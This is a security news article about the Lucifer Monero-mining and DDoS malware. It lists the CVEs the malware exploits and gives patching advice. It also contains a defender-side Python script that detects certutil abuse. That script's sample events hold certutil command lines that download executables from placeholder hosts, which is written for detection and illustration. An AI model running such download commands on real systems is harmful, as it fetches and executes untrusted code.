Lucifer: Novel Monero-Mining Malware

The recently spreading distributed denial-of-service tool attempts to exploit a dozen web-framework flaws, uses credential stuffing, and is intended to work against a variety of operating systems.

A new kind of “hybrid crypto-jacking malware” has been discovered by researchers at Palo Alto Networks’ Unit 42, who named it “Lucifer.” The malware is a variant of an old crypto-theft ransomware code. The new variant is used for cryptocurrency mining but can also facilitate distributed denial-of-service (DDoS) attacks, and it is well equipped with all kinds of exploits against vulnerable Windows hosts.

While the malware author named their malware Satan DDoS, there is already another malware, Satan Ransomware, bearing that devious name. To avoid confusion, the researchers gave this malware an alternative alias: “Lucifer”.


Lucifer is quite powerful in its capabilities. It is capable of dropping XMRig for cryptojacking. XMRig is a miner, a type of threat that makes money at the expense of computer users by using their infected computers to mine Monero, a cryptocurrency. Because XMRig consumes additional system resources, taking them away from the victim, it can cause a computer to overheat and perform poorly. Once XMRig is installed, the malware connects to the command-and-control (C&C) server to self-propagate, further exploit systemic vulnerabilities, and brute-force its way into higher levels of access. Additionally, it drops and runs EternalBlue, EternalRomance, and DoublePulsar backdoor against vulnerable targets for intranet infections.

The exhaustive list of weaponized exploits includes CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, ThinkPHP RCE vulnerabilities (CVE-2018-20062), CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, PHPStudy Backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464. These vulnerabilities have either “high” or “critical” ratings because they are trivial to exploit and inflict tremendous impact on the victim.

How are attackers exploiting the devices?

Once a vulnerability is exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging the certutil utility in the payload for malware propagation. Fortunately, the patches for these vulnerabilities are readily available.
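A defender-side illustration of the certutil point above, added here and not taken from the researchers' report: a triage function over process-creation events that flags certutil download verbs, a renamed certutil binary, and a web-service parent process. The field names follow Sysmon's process-creation record; the parent image names and the sample events are constructed assumptions.

```python
import re

# Assumed image names for the web software the page lists (HFS, Jenkins/WebLogic, PHP apps).
WEB_PARENTS = {"hfs.exe", "java.exe", "php-cgi.exe", "php.exe", "httpd.exe", "w3wp.exe"}
# certutil verbs that can fetch remote content; Windows accepts "-" or "/" as switch prefix.
DOWNLOAD_VERB = re.compile(r'(?:^|\s)[-/](urlcache|verifyctl)\b', re.I)
URL = re.compile(r'\b(?:https?|ftp)://[^\s"\']+', re.I)

# Constructed sample events (not real telemetry), using Sysmon field names.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Jenkins\jre\bin\java.exe", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/a.exe C:\ProgramData\a.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\Temp\setup.msi SHA256"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Users\Public\cu.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"cu.exe /URLCache /f http://example.invalid/x.dat x.dat"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

def basename(path):
    """Lower-cased file name from a Windows or POSIX style path."""
    return re.split(r'[\\/]', path.strip('"'))[-1].lower()

def is_certutil(event):
    # OriginalFileName comes from the PE header, so it survives a renamed copy.
    return "certutil.exe" in (basename(event.get("Image", "")),
                              event.get("OriginalFileName", "").lower())

def triage(event):
    """Return (severity, reasons) for one process-creation event."""
    if not is_certutil(event):
        return ("none", [])
    cmd = event.get("CommandLine", "")
    reasons = []
    verb, url = DOWNLOAD_VERB.search(cmd), URL.search(cmd)
    if verb and url:
        reasons.append(f"certutil {verb.group(1).lower()} fetch from {url.group(0)}")
    if basename(event.get("Image", "")) != "certutil.exe":
        reasons.append("certutil running under a different file name")
    if basename(event.get("ParentImage", "")) in WEB_PARENTS:
        reasons.append("spawned by a web-facing service process")
    if not reasons:
        return ("none", [])
    return ("high" if len(reasons) > 1 else "medium", reasons)

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, *triage(ev))
```

Routine administrative use such as `certutil -hashfile` produces no finding, so the rule stays quiet on hosts where certutil is used for its intended certificate and hashing tasks.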

Lucifer is a new hybrid of cryptojacking and DDoS malware variants that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms. Applying the updates and patches to the affected software is strongly advised. The vulnerable software includes Rejetto HTTP File Server, Jenkins, Oracle Weblogic, Drupal, Apache Struts, Laravel framework, and Microsoft Windows.


It is recommended to consider the following best practices:

  • Ensure that your Windows installation has the latest security updates.
  • Use a strong password for your Windows account. Lucifer tries to break into systems by bombarding them with common usernames and passwords such as “administrator” and “123123”, and so on. Strong passwords are also encouraged to prevent dictionary attacks.
  • Companies should lock down their containers and Docker hosts. Users should connect to the Docker daemon with SSH, never use Docker images from unknown repositories or maintainers, and use firewall rules to limit the IP addresses that can access the Docker host.
  • A strong internet security software suite can help block crypto-jacking threats.